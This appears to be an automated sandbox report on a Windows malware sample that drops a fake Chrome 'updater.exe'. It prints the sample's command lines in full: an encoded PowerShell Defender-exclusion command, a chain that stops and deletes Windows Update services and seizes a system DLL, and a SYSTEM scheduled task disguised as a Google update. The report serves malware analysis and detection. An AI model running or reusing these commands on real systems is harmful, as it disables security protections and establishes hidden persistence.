Analysis

  • max time kernel
    299s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    23-08-2022 10:15

General

  • Target

    3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe

  • Size

    1.8MB

  • MD5

    707de025f2ab727fbb3b33f4ff8b97b3

  • SHA1

    51a571a425a36cbbc3103d5e9991d080ccd4abc6

  • SHA256

    3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea

  • SHA512

    256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
    "C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1984
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1536
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:932
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:812
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1592
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:1764
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:1228
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:1164
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:876
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:880
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:1964
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:1944
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1884
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1008
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1960
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:2040
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1744
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:1728
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:1212
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:1692
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:736
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:656
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:1856
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:1372
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:1828
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2032
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                      3⤵
                      • Creates scheduled task(s)
                      PID:512
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1108
                    • C:\Windows\system32\schtasks.exe
                      schtasks /run /tn "GoogleUpdateTaskMachineQC"
                      3⤵
                        PID:560
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {A95AC557-99AE-4757-B9C9-A798EDB1D3A1} S-1-5-18:NT AUTHORITY\System:Service:
                    1⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:984
                    • C:\Program Files\Google\Chrome\updater.exe
                      "C:\Program Files\Google\Chrome\updater.exe"
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1848
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="
                        3⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1600
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        3⤵
                          PID:948
                          • C:\Windows\system32\sc.exe
                            sc stop UsoSvc
                            4⤵
                            • Launches sc.exe
                            PID:1992
                          • C:\Windows\system32\sc.exe
                            sc stop WaaSMedicSvc
                            4⤵
                            • Launches sc.exe
                            PID:432
                          • C:\Windows\system32\sc.exe
                            sc stop wuauserv
                            4⤵
                            • Launches sc.exe
                            PID:1428
                          • C:\Windows\system32\sc.exe
                            sc stop bits
                            4⤵
                            • Launches sc.exe
                            PID:1136
                          • C:\Windows\system32\sc.exe
                            sc stop dosvc
                            4⤵
                            • Launches sc.exe
                            PID:560
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                            4⤵
                            • Modifies registry key
                            PID:1560
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                            4⤵
                            • Modifies registry key
                            PID:1356
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                            4⤵
                            • Modifies registry key
                            PID:1664
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                            4⤵
                            • Modifies registry key
                            PID:1352
                          • C:\Windows\system32\reg.exe
                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                            4⤵
                            • Modifies registry key
                            PID:1248
                          • C:\Windows\system32\takeown.exe
                            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                            4⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1072
                          • C:\Windows\system32\icacls.exe
                            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                            4⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:1360
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:1976
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:1596
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:1008
                          • C:\Windows\system32\reg.exe
                            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                            4⤵
                            • Modifies registry key
                            PID:1960
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                            4⤵
                              PID:1548
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                              4⤵
                                PID:1636
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                4⤵
                                  PID:1016
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                  4⤵
                                    PID:1544
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                    4⤵
                                      PID:1476
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                      4⤵
                                        PID:932
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                        4⤵
                                          PID:1700
                                      • C:\Windows\System32\conhost.exe
                                        C:\Windows\System32\conhost.exe "tvtmluklrbli"
                                        3⤵
                                          PID:1984

                                    Network

                                    MITRE ATT&CK Enterprise v6

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Program Files\Google\Chrome\updater.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      707de025f2ab727fbb3b33f4ff8b97b3

                                      SHA1

                                      51a571a425a36cbbc3103d5e9991d080ccd4abc6

                                      SHA256

                                      3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea

                                      SHA512

                                      256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c

                                    • C:\Program Files\Google\Chrome\updater.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      707de025f2ab727fbb3b33f4ff8b97b3

                                      SHA1

                                      51a571a425a36cbbc3103d5e9991d080ccd4abc6

                                      SHA256

                                      3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea

                                      SHA512

                                      256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c

                                    • \Program Files\Google\Chrome\updater.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      707de025f2ab727fbb3b33f4ff8b97b3

                                      SHA1

                                      51a571a425a36cbbc3103d5e9991d080ccd4abc6

                                      SHA256

                                      3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea

                                      SHA512

                                      256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c

                                    • memory/380-55-0x000007FEFBDD1000-0x000007FEFBDD3000-memory.dmp

                                      Filesize

                                      8KB

                                    • memory/380-54-0x000000013F5F0000-0x000000013F7CE000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/432-107-0x0000000000000000-mapping.dmp

                                    • memory/512-77-0x0000000000000000-mapping.dmp

                                    • memory/560-79-0x0000000000000000-mapping.dmp

                                    • memory/560-110-0x0000000000000000-mapping.dmp

                                    • memory/656-97-0x0000000000000000-mapping.dmp

                                    • memory/736-94-0x0000000000000000-mapping.dmp

                                    • memory/812-65-0x0000000000000000-mapping.dmp

                                    • memory/876-70-0x0000000000000000-mapping.dmp

                                    • memory/880-71-0x0000000000000000-mapping.dmp

                                    • memory/932-64-0x0000000000000000-mapping.dmp

                                    • memory/932-128-0x0000000000000000-mapping.dmp

                                    • memory/948-105-0x0000000000000000-mapping.dmp

                                    • memory/1008-121-0x0000000000000000-mapping.dmp

                                    • memory/1008-75-0x0000000000000000-mapping.dmp

                                    • memory/1016-125-0x0000000000000000-mapping.dmp

                                    • memory/1072-117-0x0000000000000000-mapping.dmp

                                    • memory/1108-78-0x0000000000000000-mapping.dmp

                                    • memory/1136-109-0x0000000000000000-mapping.dmp

                                    • memory/1164-69-0x0000000000000000-mapping.dmp

                                    • memory/1212-92-0x0000000000000000-mapping.dmp

                                    • memory/1228-68-0x0000000000000000-mapping.dmp

                                    • memory/1248-116-0x0000000000000000-mapping.dmp

                                    • memory/1352-115-0x0000000000000000-mapping.dmp

                                    • memory/1356-113-0x0000000000000000-mapping.dmp

                                    • memory/1360-118-0x0000000000000000-mapping.dmp

                                    • memory/1372-101-0x0000000000000000-mapping.dmp

                                    • memory/1428-108-0x0000000000000000-mapping.dmp

                                    • memory/1476-127-0x0000000000000000-mapping.dmp

                                    • memory/1536-63-0x0000000000000000-mapping.dmp

                                    • memory/1544-126-0x0000000000000000-mapping.dmp

                                    • memory/1548-123-0x0000000000000000-mapping.dmp

                                    • memory/1560-111-0x0000000000000000-mapping.dmp

                                    • memory/1592-66-0x0000000000000000-mapping.dmp

                                    • memory/1596-120-0x0000000000000000-mapping.dmp

                                    • memory/1600-98-0x0000000001224000-0x0000000001227000-memory.dmp

                                      Filesize

                                      12KB

                                    • memory/1600-95-0x000007FEECB90000-0x000007FEED5B3000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/1600-86-0x0000000000000000-mapping.dmp

                                    • memory/1600-96-0x000007FEEC030000-0x000007FEECB8D000-memory.dmp

                                      Filesize

                                      11.4MB

                                    • memory/1600-99-0x000000000122B000-0x000000000124A000-memory.dmp

                                      Filesize

                                      124KB

                                    • memory/1600-104-0x000000000122B000-0x000000000124A000-memory.dmp

                                      Filesize

                                      124KB

                                    • memory/1600-103-0x0000000001224000-0x0000000001227000-memory.dmp

                                      Filesize

                                      12KB

                                    • memory/1636-124-0x0000000000000000-mapping.dmp

                                    • memory/1664-114-0x0000000000000000-mapping.dmp

                                    • memory/1692-93-0x0000000000000000-mapping.dmp

                                    • memory/1700-129-0x0000000000000000-mapping.dmp

                                    • memory/1728-91-0x0000000000000000-mapping.dmp

                                    • memory/1744-90-0x0000000000000000-mapping.dmp

                                    • memory/1764-67-0x0000000000000000-mapping.dmp

                                    • memory/1828-102-0x0000000000000000-mapping.dmp

                                    • memory/1848-84-0x000000013F990000-0x000000013FB6E000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/1848-112-0x0000000000770000-0x0000000000776000-memory.dmp

                                      Filesize

                                      24KB

                                    • memory/1848-81-0x0000000000000000-mapping.dmp

                                    • memory/1856-100-0x0000000000000000-mapping.dmp

                                    • memory/1884-74-0x0000000000000000-mapping.dmp

                                    • memory/1944-73-0x0000000000000000-mapping.dmp

                                    • memory/1960-122-0x0000000000000000-mapping.dmp

                                    • memory/1960-87-0x0000000000000000-mapping.dmp

                                    • memory/1964-72-0x0000000000000000-mapping.dmp

                                    • memory/1976-119-0x0000000000000000-mapping.dmp

                                    • memory/1984-62-0x00000000028AB000-0x00000000028CA000-memory.dmp

                                      Filesize

                                      124KB

                                    • memory/1984-59-0x000007FEECA80000-0x000007FEED5DD000-memory.dmp

                                      Filesize

                                      11.4MB

                                    • memory/1984-60-0x00000000028A4000-0x00000000028A7000-memory.dmp

                                      Filesize

                                      12KB

                                    • memory/1984-58-0x000007FEED5E0000-0x000007FEEE003000-memory.dmp

                                      Filesize

                                      10.1MB

                                    • memory/1984-61-0x00000000028A4000-0x00000000028A7000-memory.dmp

                                      Filesize

                                      12KB

                                    • memory/1984-56-0x0000000000000000-mapping.dmp

                                    • memory/1984-132-0x0000000000000000-mapping.dmp

                                    • memory/1984-130-0x0000000000060000-0x0000000000067000-memory.dmp

                                      Filesize

                                      28KB

                                    • memory/1984-133-0x0000000000060000-0x0000000000067000-memory.dmp

                                      Filesize

                                      28KB

                                    • memory/1984-134-0x00000000006E0000-0x00000000006E6000-memory.dmp

                                      Filesize

                                      24KB

                                    • memory/1992-106-0x0000000000000000-mapping.dmp

                                    • memory/2032-76-0x0000000000000000-mapping.dmp

                                    • memory/2040-88-0x0000000000000000-mapping.dmp